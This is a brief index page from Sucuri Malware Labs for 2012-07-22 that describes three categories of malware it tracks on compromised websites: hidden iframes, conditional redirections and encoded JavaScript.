Sucuri Malware Labs

Historic malware entries for 2012-07-22

We separate the data into three categories: iframes, redirections and JavaScript. For each one you can click on the domain for more information, IP addresses and details on the malware.

Hidden iframes

Latest hidden iframes our scanner has identified on compromised web sites.

Conditional redirections

Conditional redirections we have detected (based on user agents or referers).

Encoded javascript

Encoded JavaScript used to redirect visitors to Blackhole and other exploit kits, or to build a remote call.
